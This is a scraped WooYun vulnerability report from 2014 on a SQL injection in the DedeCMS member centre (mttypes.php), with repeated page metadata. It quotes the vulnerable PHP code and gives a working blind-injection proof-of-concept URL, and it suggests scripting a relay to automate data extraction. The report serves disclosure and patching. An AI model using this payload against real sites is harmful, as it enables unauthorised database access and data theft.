Dedecms 会员中心注入漏洞4 | wooyun-2014-048880| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048880

漏洞标题：Dedecms 会员中心注入漏洞4

漏洞作者： Matt

提交时间：2014-01-14 16:16

修复时间：2014-04-14 16:17

公开时间：2014-04-14 16:17

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-01-14：细节已通知厂商并且等待厂商处理中
2014-01-14：厂商已经确认，细节仅向厂商公开
2014-01-17：细节向第三方安全合作伙伴开放
2014-03-10：细节向核心白帽子及相关领域专家公开
2014-03-20：细节向普通白帽子公开
2014-03-30：细节向实习白帽子公开
2014-04-14：细节向公众公开

简要描述：

Dedecms 会员中心注入漏洞4
我不是来刷洞的~！

详细说明：

mttypes.php
elseif ($dopost == 'save')
{
    if(isset($mtypeidarr) && is_array($mtypeidarr))
    {
        $delids = '0';
        $mtypeidarr = array_filter($mtypeidarr, 'is_numeric');
        foreach($mtypeidarr as $delid)
        {
            $delids .= ','.$delid;
            unset($mtypename[$delid]);
        }
        $query = "DELETE FROM `#@__mtypes` WHERE mtypeid IN ($delids) AND mid='$cfg_ml->M_ID';";
        $dsql->ExecNoneQuery($query);
    }
    foreach ($mtypename as $id => $name)//key完全没有过滤！
    {
        $name = HtmlReplace($name);
        $query = "UPDATE `#@__mtypes` SET mtypename='$name' WHERE//直接把ID带入查询！！
 mtypeid='$id' AND mid='$cfg_ml->M_ID'";
		echo  $query."<br>";
        $dsql->ExecuteNoneQuery($query);
    }
    ShowMsg('分类修改完成','mtypes.php');
}

漏洞证明：

因为是update注入
并且用了>ExecuteNoneQuery 所以延时注入都不行
但是可以通过一个判断来进行忙注如果条件成功那么mtypename='$name' 就会被update了
首先打开
http://127.0.0.1/dede/member/mtypes.php
添加一个分类记住ID 和原来的分类名称
然后打开
http://127.0.0.1/dede/member/mtypes.php?dopost=save&mtypename[2' or @`'` AND 1%3D1 and (select 'r')%3D'r' and '1'%3D'1]=4
将其中的2改成你的分类ID
完了打开之后在返回http://127.0.0.1/dede/member/mtypes.php 如果(select 'r')='r'的话那么分类名称就被改成了4！这样我们就能来判断是否满足条件了！
可以写一个中专程序
首先访问http://127.0.0.1/dede/member/mtypes.php?dopost=save&mtypename[2' or @`'` AND 1%3D1 and (select 'r')%3D'r' and '1'%3D'1]=4 然后再返回http://127.0.0.1/dede/member/mtypes.php
的内容这样就可以用工具跑了，。，中专就懒得写了。。这个注入还是很强大的一点也不费事

测试前

测试后

修复方案：

过滤啊！

版权声明：转载请注明来源 Matt@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2014-01-14 22:25

厂商回复：

已修复，感谢反馈

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048880

漏洞标题：Dedecms 会员中心注入漏洞4

相关厂商：Dedecms

漏洞作者： Matt

提交时间：2014-01-14 16:16

修复时间：2014-04-14 16:17

公开时间：2014-04-14 16:17

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Matt@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-048880

漏洞标题：Dedecms 会员中心注入漏洞4

相关厂商：Dedecms

漏洞作者： Matt

提交时间：2014-01-14 16:16

修复时间：2014-04-14 16:17

公开时间：2014-04-14 16:17

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-048880"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Matt@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：